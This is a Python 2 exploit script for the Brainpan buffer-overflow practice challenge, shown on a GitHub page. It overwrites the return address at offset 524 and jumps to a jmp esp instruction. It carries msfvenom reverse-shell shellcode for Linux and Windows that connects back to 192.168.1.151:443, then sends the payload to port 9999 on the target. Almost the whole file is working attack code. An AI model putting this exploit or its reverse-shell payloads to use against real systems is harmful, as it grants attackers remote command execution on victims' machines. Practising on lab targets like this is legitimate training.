-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathbrainpan_bof_exploit.py
83 lines (69 loc) · 3.27 KB
/
brainpan_bof_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/python
print """
###################################################
# Exploit for the Brainpan Challange #
# Author: Bengman #
# #
# RET overwrite at offset 524 in our buffer #
# Badchars: \\x00 #
# jmp esp in brainpan.exe at 0x311712f3 #
###################################################
"""
import socket
import sys
import struct
try:
victim = sys.argv[1]
target = sys.argv[2]
except IndexError:
print "[+] Usage %s <host> <target>(Win7|Linux)" % sys.argv[0]
sys.exit()
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.151 LPORT=443 -b "\x00" -f c
# Payload size: 95 bytes
shellcode = ("\xdb\xd3\xd9\x74\x24\xf4\x58\xbb\xa3\x10\x7f\xb1\x31\xc9\xb1"
"\x12\x31\x58\x17\x03\x58\x17\x83\x4b\xec\x9d\x44\xba\xd6\x95"
"\x44\xef\xab\x0a\xe1\x0d\xa5\x4c\x45\x77\x78\x0e\x35\x2e\x32"
"\x30\xf7\x50\x7b\x36\xfe\x38\xbc\x60\x01\x2f\x54\x73\x02\x4e"
"\x1e\xfa\xe3\xe0\x06\xad\xb2\x53\x74\x4e\xbc\xb2\xb7\xd1\xec"
"\x5c\x26\xfd\x63\xf4\xde\x2e\xab\x66\x76\xb8\x50\x34\xdb\x33"
"\x77\x08\xd0\x8e\xf8")
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.151 LPORT=443 -b "\x00" -f c
# Payload size: 351 bytes
shellcode_win32 = ("\xdb\xc8\xb8\x45\x28\x36\x37\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x31\x42\x17\x03\x42\x17\x83\xaf\xd4\xd4\xc2\xd3\xcd\x9b"
"\x2d\x2b\x0e\xfc\xa4\xce\x3f\x3c\xd2\x9b\x10\x8c\x90\xc9\x9c"
"\x67\xf4\xf9\x17\x05\xd1\x0e\x9f\xa0\x07\x21\x20\x98\x74\x20"
"\xa2\xe3\xa8\x82\x9b\x2b\xbd\xc3\xdc\x56\x4c\x91\xb5\x1d\xe3"
"\x05\xb1\x68\x38\xae\x89\x7d\x38\x53\x59\x7f\x69\xc2\xd1\x26"
"\xa9\xe5\x36\x53\xe0\xfd\x5b\x5e\xba\x76\xaf\x14\x3d\x5e\xe1"
"\xd5\x92\x9f\xcd\x27\xea\xd8\xea\xd7\x99\x10\x09\x65\x9a\xe7"
"\x73\xb1\x2f\xf3\xd4\x32\x97\xdf\xe5\x97\x4e\x94\xea\x5c\x04"
"\xf2\xee\x63\xc9\x89\x0b\xef\xec\x5d\x9a\xab\xca\x79\xc6\x68"
"\x72\xd8\xa2\xdf\x8b\x3a\x0d\xbf\x29\x31\xa0\xd4\x43\x18\xad"
"\x19\x6e\xa2\x2d\x36\xf9\xd1\x1f\x99\x51\x7d\x2c\x52\x7c\x7a"
"\x53\x49\x38\x14\xaa\x72\x39\x3d\x69\x26\x69\x55\x58\x47\xe2"
"\xa5\x65\x92\xa5\xf5\xc9\x4d\x06\xa5\xa9\x3d\xee\xaf\x25\x61"
"\x0e\xd0\xef\x0a\xa5\x2b\x78\xf5\x92\x32\xef\x9d\xe0\x34\x0e"
"\xe5\x6c\xd2\x7a\x09\x39\x4d\x13\xb0\x60\x05\x82\x3d\xbf\x60"
"\x84\xb6\x4c\x95\x4b\x3f\x38\x85\x3c\xcf\x77\xf7\xeb\xd0\xad"
"\x9f\x70\x42\x2a\x5f\xfe\x7f\xe5\x08\x57\xb1\xfc\xdc\x45\xe8"
"\x56\xc2\x97\x6c\x90\x46\x4c\x4d\x1f\x47\x01\xe9\x3b\x57\xdf"
"\xf2\x07\x03\x8f\xa4\xd1\xfd\x69\x1f\x90\x57\x20\xcc\x7a\x3f"
"\xb5\x3e\xbd\x39\xba\x6a\x4b\xa5\x0b\xc3\x0a\xda\xa4\x83\x9a"
"\xa3\xd8\x33\x64\x7e\x59\x43\x2f\x22\xc8\xcc\xf6\xb7\x48\x91"
"\x08\x62\x8e\xac\x8a\x86\x6f\x4b\x92\xe3\x6a\x17\x14\x18\x07"
"\x08\xf1\x1e\xb4\x29\xd0")
if target == "Win7":
buffer = "\x41" * 524 + struct.pack('<L', 0x311712f3) + "\x90" * 25 + shellcode_win32 + "\x43" * (1000-524-4-25-len(shellcode_win32))
elif target == "Linux":
buffer = "\x41" * 524 + struct.pack('<L', 0x311712f3) + "\x90" * 25 + shellcode + "\x43" * (1000-524-4-25-len(shellcode))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "[+] Connecting to " + str(victim)
s.connect((victim, 9999))
s.recv(1024)
print "[+] Sending payload"
s.send(buffer)
except:
print "Unable to connecto to target..."
sys.exit(0)